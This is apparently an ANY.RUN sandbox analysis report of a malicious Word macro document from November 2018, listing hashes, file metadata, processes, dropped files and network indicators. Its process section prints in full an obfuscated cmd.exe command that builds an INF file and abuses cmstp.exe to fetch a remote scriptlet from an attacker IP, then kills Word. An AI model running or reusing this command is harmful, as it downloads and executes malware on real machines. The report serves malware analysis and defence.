analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

8e85cf1d1622009d98de72bb58599fc4780e77bdcff337052e771edfb93c852f

Full analysis: https://app.any.run/tasks/b8610665-7f74-4345-aadb-cdde15166ae5
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 14, 2018, 18:57:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Admin, Template: Normal.dotm, Last Saved By: cabane015 cabane015, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Wed Oct 17 02:44:00 2018, Last Saved Time/Date: Mon Nov 12 13:54:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

B6B4E05EB35049CA6D7A2533725B391D

SHA1:

DA6E18E0D8F3175A6FC3353D2BC9B6F1A2737F8C

SHA256:

8E85CF1D1622009D98DE72BB58599FC4780E77BDCFF337052E771EDFB93C852F

SSDEEP:

1536:eam5PVc86TVjh6m1BLDYhe1gAU0FSg8D0SfFaUy:Y6TVlbu7gS7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 46732.exe (PID: 2388)
  • SUSPICIOUS

    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2416)
    • Creates files in the user directory

      • cmd.exe (PID: 2416)
      • cmstp.exe (PID: 2976)
    • Executable content was dropped or overwritten

      • cmstp.exe (PID: 2976)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3724)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3724)
    • Dropped object may contain Bitcoin addresses

      • cmstp.exe (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Admin
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: cabane015 cabane015
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2018:10:17 01:44:00
ModifyDate: 2018:11:12 13:54:00
Pages: 1
Words: 4
Characters: 29
Security: None
CodePage: Windows Latin 1 (Western European)
Company:
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 32
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs cmstp.exe taskkill.exe no specs 46732.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3724"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\8e85cf1d1622009d98de72bb58599fc4780e77bdcff337052e771edfb93c852f.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
1
Version:
14.0.6024.1000
2416cmd /V /C set "Y_48=s" && !Y_48!et "Y_21=i" && !Y_48!et "Y_81=A" && !Y_48!et "Y_85=N" && !Y_48!et "Y_99=d" && c!Y_81!ll !Y_48!et "Y_84=%!Y_81!PP!Y_99!!Y_81!T!Y_81!%" && c!Y_81!ll !Y_48!et "Y_03=%R!Y_81!!Y_85!!Y_99!OM%" && !Y_48!et "Y_53=!Y_84!\M!Y_21!cro!Y_48!oft\!Y_03!.txt" && !Y_48!et "Y_40="^" && (For %i in ("[ver!Y_48!ion]" "!Y_48!ignature=$Wi!Y_85!dow!Y_48! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "!Y_81!dvancedINF=2.5" "[DefaultIn!Y_48!tall_SingleU!Y_48!er]" "UnRegi!Y_48!terOCXs=Y_04" "[Y_04]" "%11%\%Y_36_1%%Y_36_2%%Y_36_3%,NI,%Y_25_1%%Y_25_2%%Y_25_3%%Y_25_4%%Y_25_5%%Y_25_6%%Y_25_7%%Y_25_8%%Y_25_9%%Y_25_10%%Y_25_11%%Y_25_12%%Y_25_13%%Y_25_14%%Y_25_15%%Y_25_16%%Y_25_17%" "[!Y_48!tring!Y_48!]" "Y_25_1=ht" "Y_25_2=tp" "Y_25_3=:/" "Y_25_4=/7" "Y_25_5=8." "Y_25_6=12" "Y_25_7=8." "Y_25_8=92" "Y_25_9=.2" "Y_25_10=7/" "Y_25_11=Md" "Y_25_12=dX" "Y_25_13=o2" "Y_25_14=Mt" "Y_25_15=_1" "Y_25_16=.t" "Y_25_17=xt" "Y_36_2=rO" "Y_36_1=sC" "Y_36_3=bJ" ) do @echo %~i)>"!Y_53!" && echo !Y_48!erv!Y_21!ceName=!Y_40! !Y_40!>>!Y_53! && echo !Y_48!hortSvcN!Y_81!me=!Y_40! !Y_40!>>!Y_53! && c!Y_81!ll !Y_48!et "Y_80=%WI!Y_85!!Y_99!IR%" && !Y_48!t!Y_81!rt "" !Y_80!\Sy!Y_48!tem32\cm!Y_48!tp.exe /s /ns "!Y_53!" && !Y_48!t!Y_81!rt "" /M!Y_21!N t!Y_81!skk!Y_21!ll /F /!Y_21!M w!Y_21!nwor!Y_99!.exeC:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2976C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\2821.txt" C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
3104tAskkill /F /iM winword.exeC:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2388"C:\Users\admin\46732.exe" C:\Users\admin\46732.execmstp.exe
User:
admin
Company:
WinAbility® Software Corporation
Integrity Level:
MEDIUM
Description:
Folder Guard setip
Exit code:
0
Version:
9.1
Total events
1 197
Read events
1 068
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
1
Text files
5
Unknown types
6

Dropped files

PID
Process
Filename
Type
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9CB2.tmp.cvr
MD5:
SHA256:
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFF0F4AF6145124C64.TMP
MD5:
SHA256:
2976cmstp.exeC:\Users\admin\46732.exeexecutable
MD5:B918129C8C6AC9EE2770F9276E9C8D51
SHA256:0F51B56DE35EDF66093CE8819CDF356AB86CCE8C857161D357860E892AF51175
3724WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE6BF483.wmfwmf
MD5:AF530C9D4BCB46C422C9AF36FBCB7C02
SHA256:9BF1649845787731DC09915B6E15EEC2E47B6F6A37A4C91DE99BCC0EBC744D49
3724WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3A24F175-AA85-4E75-885D-445AECA3C28B}.tmpbinary
MD5:13E6DE966443B2F3E40855E6706E1255
SHA256:7E4D509860D626B6BEEC3762BE793B2DE53615AB6847898016939133005CCD32
3724WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:70C278D8BB09C3041479A9BC2AF4E1A9
SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60
2976cmstp.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\MddXo2Mt_1[1].txtxml
MD5:EDB84D9A7D3612698E328451E2ADCB8B
SHA256:9FEEC3D72211E08C4ED0F1C54FBF03B5F7B81479527EA833FF37FE1BC7ACF4F7
3724WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:D2642AE21FFEFE1B366B56BB2B281FED
SHA256:95972E634FCD54DE9A1575946FB93FE0E1B36473077782A105DE6E81848D18CA
2416cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\2821.txtini
MD5:8867A885732129089D745E2A4A739849
SHA256:34095BF69BC85554F5C2472CECCB0C8C7AC34062687D434F1D000A55AFB34380
3724WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82DFD80A.wmfwmf
MD5:102F2D4126F94ED560F8FD9BF19BE096
SHA256:4A503B9C9865C51CAB1140DFDE611E4F61E57CEE4992B01AB76C771EFB4AAD0E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2976
cmstp.exe
GET
200
78.128.92.27:80
http://78.128.92.27/MddXo2Mt_1.txt
BG
xml
312 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2976
cmstp.exe
78.128.92.27:80
BelCloud Hosting Corporation
BG
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
2976
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
1 ETPRO signatures available at the full report
No debug info